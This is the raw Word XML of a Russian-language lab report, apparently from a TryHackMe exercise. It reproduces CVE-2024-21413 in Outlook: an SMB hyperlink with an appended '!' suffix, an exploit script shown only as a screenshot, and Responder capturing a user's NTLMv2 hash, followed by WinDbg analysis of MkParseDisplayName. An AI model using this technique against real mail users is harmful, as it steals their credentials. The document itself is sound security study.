    <w:p w14:paraId="46A13B4A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47C662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D8CDFA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55AF005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3BCA92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27A669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FDF346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4BEF25D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BA29172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B37DAC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93CF4E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42112A1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A10D55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B023EE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2D76BA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BCCB68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3310C5" w14:textId="77777777" w:rsidR="00EE3A0F" w:rsidRPr="008C6E53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BCBD30" w14:textId="77777777" w:rsidR="008C6E53" w:rsidRDefault="008C6E53" w:rsidP="002B2B0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685E9" w14:textId="6DFD833B" w:rsidR="00B652C7" w:rsidRDefault="00B652C7" w:rsidP="00B652C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2.</w:t>
      </w:r>
      <w:r w:rsidR="008C6E53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="008C6E53" w:rsidRPr="008C6E53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Воспроизведение уязвимости</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295B01C0" w14:textId="0D242902" w:rsidR="006125AE" w:rsidRPr="006125AE" w:rsidRDefault="008C6E53" w:rsidP="006125AE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6E53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Проводилось</w:t>
      </w:r>
      <w:r w:rsidR="00B652C7" w:rsidRPr="008C6E53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> тестирование с использованием протокола</w:t>
      </w:r>
      <w:r w:rsidRPr="008C6E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C6E53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidR="00B652C7" w:rsidRPr="008C6E53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> для обращения к удаленному документу в формате Word. </w:t>
      </w:r>
      <w:r w:rsidRPr="008C6E53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В качестве удаленного ресурса использовался SMB-сервер с IP-адресом 10.10.111.111.</w:t>
      </w:r>
      <w:r w:rsidR="006125A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C6E53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В сообщение была добавлена гиперссылка следующего вида:</w:t>
      </w:r>
      <w:r w:rsidR="006125AE" w:rsidRPr="006125AE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B34B7B5" w14:textId="4F001F92" w:rsidR="006125AE" w:rsidRPr="006125AE" w:rsidRDefault="006125AE" w:rsidP="006125AE">
      <w:pPr>
        <w:pStyle w:val="af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125AE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A01A5A6" wp14:editId="2ECCD615">
            <wp:extent cx="4255135" cy="853339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41310"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4293719" cy="861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Рисунок 3. Ссылка, которую отправлял злоумышленник</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5645CBC6" w14:textId="282E07B0" w:rsidR="006125AE" w:rsidRDefault="006125AE" w:rsidP="006125AE">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:spacing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25AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>После нажатия на гиперссылку предупреждающие сообщения не отображались. Вместо этого в центре уведомлений Windows появилось сообщение об ошибке, а удаленный файл test.rtf не был открыт.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066438EF" w14:textId="4594B615" w:rsidR="006125AE" w:rsidRDefault="006125AE" w:rsidP="006125AE">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left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652C7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="751A2F86" wp14:editId="089E171A">
            <wp:extent cx="3451860" cy="1554480"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="30" name="Рисунок 30" descr="Figure 2 - Outlook displays an error message when the user clicks on&#10;a typical Hyperlink pointing to a remote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igure 2 - Outlook displays an error message when the user clicks on&#10;a typical Hyperlink pointing to a remote fil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FB1A" w14:textId="1332CF7D" w:rsidR="00B652C7" w:rsidRPr="006125AE" w:rsidRDefault="00B652C7" w:rsidP="006125AE">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left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125AE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6125AE" w:rsidRPr="006125AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="006125A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6125AE" w:rsidRPr="006125AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сообщение об ошибках</w:t>
      </w:r>
      <w:r w:rsidRPr="006125AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D743BF" w14:textId="61572A62" w:rsidR="006125AE" w:rsidRDefault="006125AE" w:rsidP="006125AE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25AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Однако изменение гиперссылки путем добавления </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006125AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>суффикса !something</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006125AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> после имени файла приводит к изменению поведения Outlook:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4243A549" w14:textId="0E651B08" w:rsidR="00EE3A0F" w:rsidRDefault="00EE3A0F" w:rsidP="00EE3A0F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E3A0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7CAA8A5" wp14:editId="14B49843">
            <wp:extent cx="4896533" cy="87642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140B" w14:textId="073F1B33" w:rsidR="00EE3A0F" w:rsidRPr="006125AE" w:rsidRDefault="00EE3A0F" w:rsidP="00EE3A0F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4. Добавление суффикса после имени файла</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249F86EC" w14:textId="0163ACD5" w:rsidR="006125AE" w:rsidRPr="00EF5B1C" w:rsidRDefault="006125AE" w:rsidP="006125AE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25AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Ключевым элементом является символ «!», который приводит к интерпретации ссылки как составного COM Moniker. В результате стандартный механизм обработки гиперссылок Windows вызывает функцию </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006125AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MkParseDisplayName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006125AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, инициируя </w:t>
      </w:r>
      <w:r w:rsidR="00EE3A0F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>взятие</w:t>
      </w:r>
      <w:r w:rsidRPr="006125AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Moniker</w:t>
      </w:r>
      <w:r w:rsidR="00EE3A0F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> с удаленного </w:t>
      </w:r>
      <w:r w:rsidR="00EE3A0F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6125A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879A8B0" w14:textId="77A2D925" w:rsidR="00EF5B1C" w:rsidRDefault="00BA3672" w:rsidP="006125AE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Рассмотрим пример реализации программы, со стороны злоумышленника</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA3672">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Листинг 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA3672">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>]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BA3672">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Поскольку данный пример рассчитан на использование в лабораторных условиях, код был сделан максимально простым</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Почта жертвы будет: </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00A37EF3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>victim</w:t>
        </w:r>
        <w:r w:rsidRPr="00BA3672">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>@</w:t>
        </w:r>
        <w:r w:rsidRPr="00A37EF3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>monikerlink</w:t>
        </w:r>
        <w:r w:rsidRPr="00BA3672">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidRPr="00A37EF3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>thm</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, а атакующего: </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00A37EF3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>attacker</w:t>
        </w:r>
        <w:r w:rsidRPr="00A37EF3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>@</w:t>
        </w:r>
        <w:r w:rsidRPr="00A37EF3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>monikerlink</w:t>
        </w:r>
        <w:r w:rsidRPr="00A37EF3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidRPr="00A37EF3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>thm</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BA36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74720B9B" w14:textId="60F4366B" w:rsidR="003068C1" w:rsidRDefault="003068C1" w:rsidP="003068C1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68C1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3D8A368" wp14:editId="6E842120">
            <wp:extent cx="6122670" cy="43681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C15A" w14:textId="551FBEAD" w:rsidR="003068C1" w:rsidRDefault="003068C1" w:rsidP="003068C1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5.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Exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACBB970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2D0DBC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1CCDB3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F33462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DDC476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F5A5FB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6FA862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4BF291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C84191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960103" w14:textId="77777777" w:rsidR="0025465D" w:rsidRDefault="0025465D" w:rsidP="003068C1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3A4CD26" w14:textId="79C5382F" w:rsidR="003068C1" w:rsidRP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 машине жертвы настроим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Outlook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4DB3AFD" w14:textId="7BF0DEA3" w:rsidR="00BA3672" w:rsidRDefault="00D56140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614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73A3AEC" wp14:editId="74A0615A">
            <wp:extent cx="4259580" cy="3095507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3974" cy="309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65D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 xml:space="preserve">Рисунок 6.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Outlook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> жертвы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A65FEC6" w14:textId="324A7620" w:rsidR="0025465D" w:rsidRP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Откроем на машине злоумышленника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responder</w:t>
      </w:r>
      <w:r w:rsidRPr="0025465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SMB</w:t>
      </w:r>
      <w:r w:rsidRPr="0025465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подключения и отслеживания хэша.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1593F7" w14:textId="5A74C31D" w:rsidR="00D56140" w:rsidRDefault="00D56140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6140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C6E21F3" wp14:editId="38194F21">
            <wp:extent cx="5563082" cy="373412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2CFC" w14:textId="6C4DD946" w:rsidR="00D56140" w:rsidRDefault="00D56140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7. Использование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responder</w:t>
      </w:r>
      <w:r w:rsidRPr="00D5614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SMB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порта</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561D3ECA" w14:textId="4868F453" w:rsidR="00D56140" w:rsidRP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 скрипте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exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="0025465D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 w:rsidRPr="0025465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заменим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25465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адрес в отправляемой ссылке на тот, который принадлежит злоумышленнику, чтобы при нажатии на ссылку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Moniker</w:t>
      </w:r>
      <w:r w:rsidRPr="0025465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собирался именно с этого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25465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адреса.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3815A078" w14:textId="45C34E37" w:rsidR="005743DE" w:rsidRPr="0025465D" w:rsidRDefault="005743DE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743DE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1CD7BE3" wp14:editId="33167541">
            <wp:extent cx="5189670" cy="967824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65BD" w14:textId="1C9AC586" w:rsidR="0025465D" w:rsidRDefault="005743DE" w:rsidP="0025465D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8.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25465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адрес злоумышленника</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9A401B" w14:textId="218F1809" w:rsidR="005743DE" w:rsidRDefault="005743DE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743D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999D070" wp14:editId="6CDE10E2">
            <wp:extent cx="4465707" cy="586791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2B09" w14:textId="627D3893" w:rsidR="005743DE" w:rsidRDefault="005743DE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9.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5743D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адрес сервера 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SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6F995D" w14:textId="5826C4CD" w:rsidR="0025465D" w:rsidRP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Запустим скрипт.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F2A19B" w14:textId="1FECCACA" w:rsidR="005743DE" w:rsidRDefault="005743DE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743DE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A2C6D11" wp14:editId="7560FC2A">
            <wp:extent cx="4968671" cy="1912786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032C" w14:textId="37DDC2A2" w:rsidR="005743DE" w:rsidRDefault="005743DE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10. Успешная отправка письма</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED21D6D" w14:textId="2E1A9FB4" w:rsidR="005743DE" w:rsidRDefault="005743DE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743D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E6D897E" wp14:editId="5B407D17">
            <wp:extent cx="2972058" cy="270533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0048" w14:textId="12A2D3C6" w:rsidR="005743DE" w:rsidRDefault="005743DE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11. Получение письма</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F18604" w14:textId="77777777" w:rsidR="002D090A" w:rsidRPr="006125AE" w:rsidRDefault="002D090A" w:rsidP="002D090A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</w:t>
      </w:r>
      <w:r w:rsidRPr="006125AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ри обработке такой ссылки операционная система выполняет попытку подключения к удаленному SMB-ресурсу (порт 445). При этом автоматически </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">передается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NTLM</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3A0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хэш, для аутентификации пользователя, который получает злоумышленник.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C06F4FE" w14:textId="77777777" w:rsidR="002D090A" w:rsidRDefault="002D090A" w:rsidP="002D090A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E8C20F" w14:textId="67C804D7" w:rsidR="005743DE" w:rsidRDefault="005743DE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743D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F6EAA48" wp14:editId="538787DD">
            <wp:extent cx="5616427" cy="2286198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BB8A" w14:textId="3A3FCAE9" w:rsidR="005743DE" w:rsidRDefault="005743DE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12. Итог нажатия на гиперссылку</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19485D12" w14:textId="7F8BF397" w:rsidR="005743DE" w:rsidRDefault="002D090A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D090A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70CEB5B" wp14:editId="5B8D2075">
            <wp:extent cx="6122670" cy="274891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752C" w14:textId="6A6D9375" w:rsidR="002D090A" w:rsidRDefault="002D090A" w:rsidP="00D561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13. Результат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responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F804A1E" w14:textId="3BA1A735" w:rsidR="002D090A" w:rsidRDefault="002D090A" w:rsidP="002D090A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090A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В результате обработки Moniker-ссылки операционная система инициировала SMB-подключение к удаленному серверу. Инструмент </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D090A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Responder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D090A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> успешно перехватил NTLMv2-аутентификационные данные пользователя THM-MONIKERLINK\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D090A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tryhackme</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D090A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, что подтверждает возможность получения учетных данных при эксплуатации CVE-2024-21413.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1421BE16" w14:textId="77777777" w:rsidR="002D090A" w:rsidRPr="002D090A" w:rsidRDefault="002D090A" w:rsidP="002D090A">
      <w:pPr>
        <w:pStyle w:val="af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127654" w14:textId="47608EA7" w:rsidR="0025465D" w:rsidRPr="0025465D" w:rsidRDefault="0025465D" w:rsidP="0025465D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2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Исследование процесса обработки ссылки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A426493" w14:textId="6258DC90" w:rsidR="00B652C7" w:rsidRPr="000C67BA" w:rsidRDefault="00EE3A0F" w:rsidP="00B652C7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0F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Для исследования процесса обработки гиперссылки в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE3A0F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>WinDbg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE3A0F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> была установлена точка останова на функции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE3A0F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MkParseDisplayName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE3A0F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. После перехода по ссылке выполнение программы было остановлено в момент вызова данной функции, что позволило исследовать стек вызовов и передаваемые параметры.</w:t>
      </w:r>
      <w:r w:rsidR="00B652C7" w:rsidRPr="00B652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8CE9A5" wp14:editId="5147E5C6">
            <wp:extent cx="6122670" cy="35255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4166" w14:textId="7263BD6F" w:rsidR="00B652C7" w:rsidRDefault="00B652C7" w:rsidP="00B652C7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D090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 Стек вызовов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E1CB7E" w14:textId="4F5C3030" w:rsidR="00B652C7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0F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Согласно документации Microsoft, вторым параметром функции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE3A0F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MkParseDisplayName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE3A0F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> является </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
